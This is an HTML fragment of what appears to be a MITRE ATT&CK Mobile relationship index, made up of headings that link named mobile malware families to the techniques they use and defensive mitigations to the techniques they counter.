<h3 id="_gooligan_mob_s0006_uses_exploit_os_vulnerability_mob_t1007"><a class="anchor" href="#_gooligan_mob_s0006_uses_exploit_os_vulnerability_mob_t1007"></a><a class="link" href="#_gooligan_mob_s0006_uses_exploit_os_vulnerability_mob_t1007">Gooligan (MOB-S0006) uses Exploit OS Vulnerability (MOB-T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_exploit_os_vulnerability_mob_t1007"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_exploit_os_vulnerability_mob_t1007"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_exploit_os_vulnerability_mob_t1007">Application Vetting (MOB-M1005) mitigates Exploit OS Vulnerability (MOB-T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_androrat_mob_s0008_uses_location_tracking_mob_t1033"><a class="anchor" href="#_androrat_mob_s0008_uses_location_tracking_mob_t1033"></a><a class="link" href="#_androrat_mob_s0008_uses_location_tracking_mob_t1033">AndroRAT (MOB-S0008) uses Location Tracking (MOB-T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_lock_bootloader_mob_m1003_mitigates_modify_system_partition_mob_t1003"><a class="anchor" href="#_lock_bootloader_mob_m1003_mitigates_modify_system_partition_mob_t1003"></a><a class="link" href="#_lock_bootloader_mob_m1003_mitigates_modify_system_partition_mob_t1003">Lock Bootloader (MOB-M1003) mitigates Modify System Partition (MOB-T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_premium_sms_toll_fraud_mob_t1051"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_premium_sms_toll_fraud_mob_t1051"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_premium_sms_toll_fraud_mob_t1051">Use Recent OS Version (MOB-M1006) mitigates Premium SMS Toll Fraud (MOB-T1051)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_user_interface_spoofing_mob_t1014"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_user_interface_spoofing_mob_t1014"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_user_interface_spoofing_mob_t1014">Use Recent OS Version (MOB-M1006) mitigates User Interface Spoofing (MOB-T1014)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_for_android_mob_s0032_uses_exploit_os_vulnerability_mob_t1007"><a class="anchor" href="#_pegasus_for_android_mob_s0032_uses_exploit_os_vulnerability_mob_t1007"></a><a class="link" href="#_pegasus_for_android_mob_s0032_uses_exploit_os_vulnerability_mob_t1007">Pegasus for Android (MOB-S0032) uses Exploit OS Vulnerability (MOB-T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_adups_mob_s0025_uses_access_contact_list_mob_t1035"><a class="anchor" href="#_adups_mob_s0025_uses_access_contact_list_mob_t1035"></a><a class="link" href="#_adups_mob_s0025_uses_access_contact_list_mob_t1035">Adups (MOB-S0025) uses Access Contact List (MOB-T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_droidjack_rat_mob_s0036_uses_repackaged_application_mob_t1047"><a class="anchor" href="#_droidjack_rat_mob_s0036_uses_repackaged_application_mob_t1047"></a><a class="link" href="#_droidjack_rat_mob_s0036_uses_repackaged_application_mob_t1047">DroidJack RAT (MOB-S0036) uses Repackaged Application (MOB-T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_mob_s0005_uses_exploit_os_vulnerability_mob_t1007"><a class="anchor" href="#_pegasus_mob_s0005_uses_exploit_os_vulnerability_mob_t1007"></a><a class="link" href="#_pegasus_mob_s0005_uses_exploit_os_vulnerability_mob_t1007">Pegasus (MOB-S0005) uses Exploit OS Vulnerability (MOB-T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_rumms_mob_s0029_uses_local_network_configuration_discovery_mob_t1025"><a class="anchor" href="#_rumms_mob_s0029_uses_local_network_configuration_discovery_mob_t1025"></a><a class="link" href="#_rumms_mob_s0029_uses_local_network_configuration_discovery_mob_t1025">RuMMS (MOB-S0029) uses Local Network Configuration Discovery (MOB-T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_access_call_log_mob_t1036"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_access_call_log_mob_t1036"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_access_call_log_mob_t1036">Use Recent OS Version (MOB-M1006) mitigates Access Call Log (MOB-T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_encrypt_files_for_ransom_mob_t1074"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_encrypt_files_for_ransom_mob_t1074"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_encrypt_files_for_ransom_mob_t1074">Application Vetting (MOB-M1005) mitigates Encrypt Files for Ransom (MOB-T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_keyraider_mob_s0004_uses_network_traffic_capture_or_redirection_mob_t1013"><a class="anchor" href="#_keyraider_mob_s0004_uses_network_traffic_capture_or_redirection_mob_t1013"></a><a class="link" href="#_keyraider_mob_s0004_uses_network_traffic_capture_or_redirection_mob_t1013">KeyRaider (MOB-S0004) uses Network Traffic Capture or Redirection (MOB-T1013)</a></h3>
</div>
<div class="sect2">
<h3 id="_rcsandroid_mob_s0011_uses_microphone_or_camera_recordings_mob_t1032"><a class="anchor" href="#_rcsandroid_mob_s0011_uses_microphone_or_camera_recordings_mob_t1032"></a><a class="link" href="#_rcsandroid_mob_s0011_uses_microphone_or_camera_recordings_mob_t1032">RCSAndroid (MOB-S0011) uses Microphone or Camera Recordings (MOB-T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_encrypt_network_traffic_mob_m1009_mitigates_network_traffic_capture_or_redirection_mob_t1013"><a class="anchor" href="#_encrypt_network_traffic_mob_m1009_mitigates_network_traffic_capture_or_redirection_mob_t1013"></a><a class="link" href="#_encrypt_network_traffic_mob_m1009_mitigates_network_traffic_capture_or_redirection_mob_t1013">Encrypt Network Traffic (MOB-M1009) mitigates Network Traffic Capture or Redirection (MOB-T1013)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_for_android_mob_s0032_uses_app_auto_start_at_device_boot_mob_t1005"><a class="anchor" href="#_pegasus_for_android_mob_s0032_uses_app_auto_start_at_device_boot_mob_t1005"></a><a class="link" href="#_pegasus_for_android_mob_s0032_uses_app_auto_start_at_device_boot_mob_t1005">Pegasus for Android (MOB-S0032) uses App Auto-Start at Device Boot (MOB-T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_enterprise_policy_mob_m1012_mitigates_app_delivered_via_email_attachment_mob_t1037"><a class="anchor" href="#_enterprise_policy_mob_m1012_mitigates_app_delivered_via_email_attachment_mob_t1037"></a><a class="link" href="#_enterprise_policy_mob_m1012_mitigates_app_delivered_via_email_attachment_mob_t1037">Enterprise Policy (MOB-M1012) mitigates App Delivered via Email Attachment (MOB-T1037)</a></h3>
</div>
<div class="sect2">
<h3 id="_spynote_rat_mob_s0021_uses_location_tracking_mob_t1033"><a class="anchor" href="#_spynote_rat_mob_s0021_uses_location_tracking_mob_t1033"></a><a class="link" href="#_spynote_rat_mob_s0021_uses_location_tracking_mob_t1033">SpyNote RAT (MOB-S0021) uses Location Tracking (MOB-T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_user_guidance_mob_m1011_mitigates_app_delivered_via_email_attachment_mob_t1037"><a class="anchor" href="#_user_guidance_mob_m1011_mitigates_app_delivered_via_email_attachment_mob_t1037"></a><a class="link" href="#_user_guidance_mob_m1011_mitigates_app_delivered_via_email_attachment_mob_t1037">User Guidance (MOB-M1011) mitigates App Delivered via Email Attachment (MOB-T1037)</a></h3>
</div>
<div class="sect2">
<h3 id="_braintest_mob_s0009_uses_manipulate_app_store_rankings_or_ratings_mob_t1055"><a class="anchor" href="#_braintest_mob_s0009_uses_manipulate_app_store_rankings_or_ratings_mob_t1055"></a><a class="link" href="#_braintest_mob_s0009_uses_manipulate_app_store_rankings_or_ratings_mob_t1055">BrainTest (MOB-S0009) uses Manipulate App Store Rankings or Ratings (MOB-T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_lock_bootloader_mob_m1003_mitigates_exploit_via_charging_station_or_pc_mob_t1061"><a class="anchor" href="#_lock_bootloader_mob_m1003_mitigates_exploit_via_charging_station_or_pc_mob_t1061"></a><a class="link" href="#_lock_bootloader_mob_m1003_mitigates_exploit_via_charging_station_or_pc_mob_t1061">Lock Bootloader (MOB-M1003) mitigates Exploit via Charging Station or PC (MOB-T1061)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_mob_s0005_uses_malicious_sms_message_mob_t1057"><a class="anchor" href="#_pegasus_mob_s0005_uses_malicious_sms_message_mob_t1057"></a><a class="link" href="#_pegasus_mob_s0005_uses_malicious_sms_message_mob_t1057">Pegasus (MOB-S0005) uses Malicious SMS Message (MOB-T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_abuse_accessibility_features_mob_t1056"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_abuse_accessibility_features_mob_t1056"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_abuse_accessibility_features_mob_t1056">Use Recent OS Version (MOB-M1006) mitigates Abuse Accessibility Features (MOB-T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_mob_s0005_uses_access_contact_list_mob_t1035"><a class="anchor" href="#_pegasus_mob_s0005_uses_access_contact_list_mob_t1035"></a><a class="link" href="#_pegasus_mob_s0005_uses_access_contact_list_mob_t1035">Pegasus (MOB-S0005) uses Access Contact List (MOB-T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_charger_mob_s0039_uses_access_contact_list_mob_t1035"><a class="anchor" href="#_charger_mob_s0039_uses_access_contact_list_mob_t1035"></a><a class="link" href="#_charger_mob_s0039_uses_access_contact_list_mob_t1035">Charger (MOB-S0039) uses Access Contact List (MOB-T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_caution_with_device_administrator_access_mob_m1007_mitigates_abuse_device_administrator_access_to_prevent_removal_mob_t1004"><a class="anchor" href="#_caution_with_device_administrator_access_mob_m1007_mitigates_abuse_device_administrator_access_to_prevent_removal_mob_t1004"></a><a class="link" href="#_caution_with_device_administrator_access_mob_m1007_mitigates_abuse_device_administrator_access_to_prevent_removal_mob_t1004">Caution with Device Administrator Access (MOB-M1007) mitigates Abuse Device Administrator Access to Prevent Removal (MOB-T1004)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_obfuscated_or_encrypted_payload_mob_t1009"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_obfuscated_or_encrypted_payload_mob_t1009"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_obfuscated_or_encrypted_payload_mob_t1009">Application Vetting (MOB-M1005) mitigates Obfuscated or Encrypted Payload (MOB-T1009)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_local_network_configuration_discovery_mob_t1025"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_local_network_configuration_discovery_mob_t1025"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_local_network_configuration_discovery_mob_t1025">Use Recent OS Version (MOB-M1006) mitigates Local Network Configuration Discovery (MOB-T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_gooligan_mob_s0006_uses_access_sensitive_data_or_credentials_in_files_mob_t1012"><a class="anchor" href="#_gooligan_mob_s0006_uses_access_sensitive_data_or_credentials_in_files_mob_t1012"></a><a class="link" href="#_gooligan_mob_s0006_uses_access_sensitive_data_or_credentials_in_files_mob_t1012">Gooligan (MOB-S0006) uses Access Sensitive Data or Credentials in Files (MOB-T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_process_discovery_mob_t1027"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_process_discovery_mob_t1027"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_process_discovery_mob_t1027">Application Vetting (MOB-M1005) mitigates Process Discovery (MOB-T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_encrypt_network_traffic_mob_m1009_mitigates_eavesdrop_on_insecure_network_communication_mob_t1042"><a class="anchor" href="#_encrypt_network_traffic_mob_m1009_mitigates_eavesdrop_on_insecure_network_communication_mob_t1042"></a><a class="link" href="#_encrypt_network_traffic_mob_m1009_mitigates_eavesdrop_on_insecure_network_communication_mob_t1042">Encrypt Network Traffic (MOB-M1009) mitigates Eavesdrop on Insecure Network Communication (MOB-T1042)</a></h3>
</div>
<div class="sect2">
<h3 id="_user_guidance_mob_m1011_mitigates_malicious_or_vulnerable_built_in_device_functionality_mob_t1076"><a class="anchor" href="#_user_guidance_mob_m1011_mitigates_malicious_or_vulnerable_built_in_device_functionality_mob_t1076"></a><a class="link" href="#_user_guidance_mob_m1011_mitigates_malicious_or_vulnerable_built_in_device_functionality_mob_t1076">User Guidance (MOB-M1011) mitigates Malicious or Vulnerable Built-in Device Functionality (MOB-T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_dendroid_mob_s0017_uses_microphone_or_camera_recordings_mob_t1032"><a class="anchor" href="#_dendroid_mob_s0017_uses_microphone_or_camera_recordings_mob_t1032"></a><a class="link" href="#_dendroid_mob_s0017_uses_microphone_or_camera_recordings_mob_t1032">Dendroid (MOB-S0017) uses Microphone or Camera Recordings (MOB-T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_capture_sms_messages_mob_t1015"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_capture_sms_messages_mob_t1015"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_capture_sms_messages_mob_t1015">Use Recent OS Version (MOB-M1006) mitigates Capture SMS Messages (MOB-T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_yispecter_mob_s0027_uses_abuse_of_ios_enterprise_app_signing_key_mob_t1048"><a class="anchor" href="#_yispecter_mob_s0027_uses_abuse_of_ios_enterprise_app_signing_key_mob_t1048"></a><a class="link" href="#_yispecter_mob_s0027_uses_abuse_of_ios_enterprise_app_signing_key_mob_t1048">YiSpecter (MOB-S0027) uses Abuse of iOS Enterprise App Signing Key (MOB-T1048)</a></h3>
</div>
<div class="sect2">
<h3 id="_droidjack_rat_mob_s0036_uses_capture_sms_messages_mob_t1015"><a class="anchor" href="#_droidjack_rat_mob_s0036_uses_capture_sms_messages_mob_t1015"></a><a class="link" href="#_droidjack_rat_mob_s0036_uses_capture_sms_messages_mob_t1015">DroidJack RAT (MOB-S0036) uses Capture SMS Messages (MOB-T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_android_chuli_a_mob_s0020_uses_app_delivered_via_email_attachment_mob_t1037"><a class="anchor" href="#_android_chuli_a_mob_s0020_uses_app_delivered_via_email_attachment_mob_t1037"></a><a class="link" href="#_android_chuli_a_mob_s0020_uses_app_delivered_via_email_attachment_mob_t1037">Android/Chuli.A (MOB-S0020) uses App Delivered via Email Attachment (MOB-T1037)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_lockscreen_bypass_mob_t1064"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_lockscreen_bypass_mob_t1064"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_lockscreen_bypass_mob_t1064">Use Recent OS Version (MOB-M1006) mitigates Lockscreen Bypass (MOB-T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_rumms_mob_s0029_uses_capture_sms_messages_mob_t1015"><a class="anchor" href="#_rumms_mob_s0029_uses_capture_sms_messages_mob_t1015"></a><a class="link" href="#_rumms_mob_s0029_uses_capture_sms_messages_mob_t1015">RuMMS (MOB-S0029) uses Capture SMS Messages (MOB-T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_android_intent_hijacking_mob_t1019"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_android_intent_hijacking_mob_t1019"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_android_intent_hijacking_mob_t1019">Application Vetting (MOB-M1005) mitigates Android Intent Hijacking (MOB-T1019)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_network_traffic_capture_or_redirection_mob_t1013"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_network_traffic_capture_or_redirection_mob_t1013"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_network_traffic_capture_or_redirection_mob_t1013">Use Recent OS Version (MOB-M1006) mitigates Network Traffic Capture or Redirection (MOB-T1013)</a></h3>
</div>
<div class="sect2">
<h3 id="_notcompatible_mob_s0015_uses_exploit_enterprise_resources_mob_t1031"><a class="anchor" href="#_notcompatible_mob_s0015_uses_exploit_enterprise_resources_mob_t1031"></a><a class="link" href="#_notcompatible_mob_s0015_uses_exploit_enterprise_resources_mob_t1031">NotCompatible (MOB-S0015) uses Exploit Enterprise Resources (MOB-T1031)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_exploit_via_charging_station_or_pc_mob_t1061"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_exploit_via_charging_station_or_pc_mob_t1061"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_exploit_via_charging_station_or_pc_mob_t1061">Security Updates (MOB-M1001) mitigates Exploit via Charging Station or PC (MOB-T1061)</a></h3>
</div>
<div class="sect2">
<h3 id="_spynote_rat_mob_s0021_uses_access_contact_list_mob_t1035"><a class="anchor" href="#_spynote_rat_mob_s0021_uses_access_contact_list_mob_t1035"></a><a class="link" href="#_spynote_rat_mob_s0021_uses_access_contact_list_mob_t1035">SpyNote RAT (MOB-S0021) uses Access Contact List (MOB-T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_rumms_mob_s0029_uses_app_delivered_via_web_download_mob_t1034"><a class="anchor" href="#_rumms_mob_s0029_uses_app_delivered_via_web_download_mob_t1034"></a><a class="link" href="#_rumms_mob_s0029_uses_app_delivered_via_web_download_mob_t1034">RuMMS (MOB-S0029) uses App Delivered via Web Download (MOB-T1034)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_mob_s0005_uses_local_network_configuration_discovery_mob_t1025"><a class="anchor" href="#_pegasus_mob_s0005_uses_local_network_configuration_discovery_mob_t1025"></a><a class="link" href="#_pegasus_mob_s0005_uses_local_network_configuration_discovery_mob_t1025">Pegasus (MOB-S0005) uses Local Network Configuration Discovery (MOB-T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_device_type_discovery_mob_t1022"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_device_type_discovery_mob_t1022"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_device_type_discovery_mob_t1022">Application Vetting (MOB-M1005) mitigates Device Type Discovery (MOB-T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_user_guidance_mob_m1011_mitigates_repackaged_application_mob_t1047"><a class="anchor" href="#_user_guidance_mob_m1011_mitigates_repackaged_application_mob_t1047"></a><a class="link" href="#_user_guidance_mob_m1011_mitigates_repackaged_application_mob_t1047">User Guidance (MOB-M1011) mitigates Repackaged Application (MOB-T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_file_and_directory_discovery_mob_t1023"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_file_and_directory_discovery_mob_t1023"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_file_and_directory_discovery_mob_t1023">Use Recent OS Version (MOB-M1006) mitigates File and Directory Discovery (MOB-T1023)</a></h3>
</div>
<div class="sect2">
<h3 id="_androrat_mob_s0008_uses_capture_sms_messages_mob_t1015"><a class="anchor" href="#_androrat_mob_s0008_uses_capture_sms_messages_mob_t1015"></a><a class="link" href="#_androrat_mob_s0008_uses_capture_sms_messages_mob_t1015">AndroRAT (MOB-S0008) uses Capture SMS Messages (MOB-T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_user_guidance_mob_m1011_mitigates_abuse_of_ios_enterprise_app_signing_key_mob_t1048"><a class="anchor" href="#_user_guidance_mob_m1011_mitigates_abuse_of_ios_enterprise_app_signing_key_mob_t1048"></a><a class="link" href="#_user_guidance_mob_m1011_mitigates_abuse_of_ios_enterprise_app_signing_key_mob_t1048">User Guidance (MOB-M1011) mitigates Abuse of iOS Enterprise App Signing Key (MOB-T1048)</a></h3>
</div>
<div class="sect2">
<h3 id="_android_chuli_a_mob_s0020_uses_access_contact_list_mob_t1035"><a class="anchor" href="#_android_chuli_a_mob_s0020_uses_access_contact_list_mob_t1035"></a><a class="link" href="#_android_chuli_a_mob_s0020_uses_access_contact_list_mob_t1035">Android/Chuli.A (MOB-S0020) uses Access Contact List (MOB-T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_exploit_baseband_vulnerability_mob_t1058"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_exploit_baseband_vulnerability_mob_t1058"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_exploit_baseband_vulnerability_mob_t1058">Security Updates (MOB-M1001) mitigates Exploit Baseband Vulnerability (MOB-T1058)</a></h3>
</div>
<div class="sect2">
<h3 id="_braintest_mob_s0009_uses_modify_system_partition_mob_t1003"><a class="anchor" href="#_braintest_mob_s0009_uses_modify_system_partition_mob_t1003"></a><a class="link" href="#_braintest_mob_s0009_uses_modify_system_partition_mob_t1003">BrainTest (MOB-S0009) uses Modify System Partition (MOB-T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_enterprise_policy_mob_m1012_mitigates_app_delivered_via_web_download_mob_t1034"><a class="anchor" href="#_enterprise_policy_mob_m1012_mitigates_app_delivered_via_web_download_mob_t1034"></a><a class="link" href="#_enterprise_policy_mob_m1012_mitigates_app_delivered_via_web_download_mob_t1034">Enterprise Policy (MOB-M1012) mitigates App Delivered via Web Download (MOB-T1034)</a></h3>
</div>
<div class="sect2">
<h3 id="_obad_mob_s0002_uses_obfuscated_or_encrypted_payload_mob_t1009"><a class="anchor" href="#_obad_mob_s0002_uses_obfuscated_or_encrypted_payload_mob_t1009"></a><a class="link" href="#_obad_mob_s0002_uses_obfuscated_or_encrypted_payload_mob_t1009">OBAD (MOB-S0002) uses Obfuscated or Encrypted Payload (MOB-T1009)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_malicious_or_vulnerable_built_in_device_functionality_mob_t1076"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_malicious_or_vulnerable_built_in_device_functionality_mob_t1076"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_malicious_or_vulnerable_built_in_device_functionality_mob_t1076">Use Recent OS Version (MOB-M1006) mitigates Malicious or Vulnerable Built-in Device Functionality (MOB-T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_trojan_sms_androidos_agent_ao_mob_s0023_uses_standard_application_layer_protocol_mob_t1040"><a class="anchor" href="#_trojan_sms_androidos_agent_ao_mob_s0023_uses_standard_application_layer_protocol_mob_t1040"></a><a class="link" href="#_trojan_sms_androidos_agent_ao_mob_s0023_uses_standard_application_layer_protocol_mob_t1040">Trojan-SMS.AndroidOS.Agent.ao (MOB-S0023) uses Standard Application Layer Protocol (MOB-T1040)</a></h3>
</div>
<div class="sect2">
<h3 id="_enterprise_policy_mob_m1012_mitigates_biometric_spoofing_mob_t1063"><a class="anchor" href="#_enterprise_policy_mob_m1012_mitigates_biometric_spoofing_mob_t1063"></a><a class="link" href="#_enterprise_policy_mob_m1012_mitigates_biometric_spoofing_mob_t1063">Enterprise Policy (MOB-M1012) mitigates Biometric Spoofing (MOB-T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_mob_s0005_uses_access_call_log_mob_t1036"><a class="anchor" href="#_pegasus_mob_s0005_uses_access_call_log_mob_t1036"></a><a class="link" href="#_pegasus_mob_s0005_uses_access_call_log_mob_t1036">Pegasus (MOB-S0005) uses Access Call Log (MOB-T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006_mitigates_device_unlock_code_guessing_or_brute_force_mob_t1062"><a class="anchor" href="#_use_recent_os_version_mob_m1006_mitigates_device_unlock_code_guessing_or_brute_force_mob_t1062"></a><a class="link" href="#_use_recent_os_version_mob_m1006_mitigates_device_unlock_code_guessing_or_brute_force_mob_t1062">Use Recent OS Version (MOB-M1006) mitigates Device Unlock Code Guessing or Brute Force (MOB-T1062)</a></h3>
</div>
<div class="sect2">
<h3 id="_wirelurker_mob_s0028_uses_exploit_via_charging_station_or_pc_mob_t1061"><a class="anchor" href="#_wirelurker_mob_s0028_uses_exploit_via_charging_station_or_pc_mob_t1061"></a><a class="link" href="#_wirelurker_mob_s0028_uses_exploit_via_charging_station_or_pc_mob_t1061">WireLurker (MOB-S0028) uses Exploit via Charging Station or PC (MOB-T1061)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_premium_sms_toll_fraud_mob_t1051"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_premium_sms_toll_fraud_mob_t1051"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_premium_sms_toll_fraud_mob_t1051">Application Vetting (MOB-M1005) mitigates Premium SMS Toll Fraud (MOB-T1051)</a></h3>
</div>
<div class="sect2">
<h3 id="_android_chuli_a_mob_s0020_uses_alternate_network_mediums_mob_t1041"><a class="anchor" href="#_android_chuli_a_mob_s0020_uses_alternate_network_mediums_mob_t1041"></a><a class="link" href="#_android_chuli_a_mob_s0020_uses_alternate_network_mediums_mob_t1041">Android/Chuli.A (MOB-S0020) uses Alternate Network Mediums (MOB-T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_malicious_media_content_mob_t1060"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_malicious_media_content_mob_t1060"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_malicious_media_content_mob_t1060">Security Updates (MOB-M1001) mitigates Malicious Media Content (MOB-T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_network_traffic_capture_or_redirection_mob_t1013"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_network_traffic_capture_or_redirection_mob_t1013"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_network_traffic_capture_or_redirection_mob_t1013">Application Vetting (MOB-M1005) mitigates Network Traffic Capture or Redirection (MOB-T1013)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_for_android_mob_s0032_uses_detect_app_analysis_environment_mob_t1043"><a class="anchor" href="#_pegasus_for_android_mob_s0032_uses_detect_app_analysis_environment_mob_t1043"></a><a class="link" href="#_pegasus_for_android_mob_s0032_uses_detect_app_analysis_environment_mob_t1043">Pegasus for Android (MOB-S0032) uses Detect App Analysis Environment (MOB-T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005_mitigates_access_contact_list_mob_t1035"><a class="anchor" href="#_application_vetting_mob_m1005_mitigates_access_contact_list_mob_t1035"></a><a class="link" href="#_application_vetting_mob_m1005_mitigates_access_contact_list_mob_t1035">Application Vetting (MOB-M1005) mitigates Access Contact List (MOB-T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_mazarbot_mob_s0019_uses_premium_sms_toll_fraud_mob_t1051"><a class="anchor" href="#_mazarbot_mob_s0019_uses_premium_sms_toll_fraud_mob_t1051"></a><a class="link" href="#_mazarbot_mob_s0019_uses_premium_sms_toll_fraud_mob_t1051">MazarBOT (MOB-S0019) uses Premium SMS Toll Fraud (MOB-T1051)</a></h3>
</div>
<div class="sect2">
<h3 id="_user_guidance_mob_m1011_mitigates_attack_pc_via_usb_connection_mob_t1030"><a class="anchor" href="#_user_guidance_mob_m1011_mitigates_attack_pc_via_usb_connection_mob_t1030"></a><a class="link" href="#_user_guidance_mob_m1011_mitigates_attack_pc_via_usb_connection_mob_t1030">User Guidance (MOB-M1011) mitigates Attack PC via USB Connection (MOB-T1030)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001_mitigates_access_sensitive_data_or_credentials_in_files_mob_t1012"><a class="anchor" href="#_security_updates_mob_m1001_mitigates_access_sensitive_data_or_credentials_in_files_mob_t1012"></a><a class="link" href="#_security_updates_mob_m1001_mitigates_access_sensitive_data_or_credentials_in_files_mob_t1012">Security Updates (MOB-M1001) mitigates Access Sensitive Data or Credentials in Files (MOB-T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_pegasus_for_android_mob_s0032_uses_access_calendar_entries_mob_t1038"><a class="anchor" href="#_pegasus_for_android_mob_s0032_uses_access_calendar_entries_mob_t1038"></a><a class="link" href="#_pegasus_for_android_mob_s0032_uses_access_calendar_entries_mob_t1038">Pegasus for Android (MOB-S0032) uses Access Calendar Entries (MOB-T1038)</a></h3>
</div>
<div class="sect2">
<h3 id="_zerghelper_mob_s0003_uses_detect_app_analysis_environment_mob_t1043"><a class="anchor" href="#_zerghelper_mob_s0003_uses_detect_app_analysis_environment_mob_t1043"></a><a class="link" href="#_zerghelper_mob_s0003_uses_detect_app_analysis_environment_mob_t1043">ZergHelper (MOB-S0003) uses Detect App Analysis Environment (MOB-T1043)</a></h3>
</div>
<div class="sect2">
